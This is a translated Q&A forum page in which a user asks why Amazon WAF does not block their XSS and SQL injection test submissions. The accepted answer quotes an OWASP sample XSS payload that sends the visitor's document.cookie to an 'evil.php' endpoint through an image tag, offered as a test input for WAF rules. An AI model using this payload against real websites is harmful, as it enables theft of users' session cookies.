Chris Muench Asked: 2017-06-23 10:59:42 +0800 CST2017-06-23 10:59:42 +0800 CST 2017-06-23 10:59:42 +0800 CST Amazon WAF 不阻止 XSS 或 SQL 注入 772 我尝试提交表单,<script>danger</script>但没有被阻止。我将 WAF 放在我的 ELB 上并进行了测试以确保我有分析(下)。 我究竟做错了什么? 这是我的 ACL: 这是我的 XSS 和 SQL 规则: 分析:(显示流量确实通过 LB 路由) amazon-ec2 1 个回答 Voted Best Answer JonathanDavidArndt 2017-06-30T07:09:35+08:002017-06-30T07:09:35+08:00 下面是一个如何触发 XSS 规则的示例。这应该会自行触发您的规则(您可以通过将其指向您自己的 PHP 页面或其他 Web 位置来证明它),但这至少展示了一般原则。 <script type="text/javascript"> var adr = '../evil.php?cakemonster=' + escape(document.cookie); document.write("<img src='" + adr + "' />"); </script> 此示例和其他示例可在以下 OWASP 文章中找到: 跨站脚本 (XSS) - OWASP
下面是一个如何触发 XSS 规则的示例。这应该会自行触发您的规则(您可以通过将其指向您自己的 PHP 页面或其他 Web 位置来证明它),但这至少展示了一般原则。
此示例和其他示例可在以下 OWASP 文章中找到:
跨站脚本 (XSS) - OWASP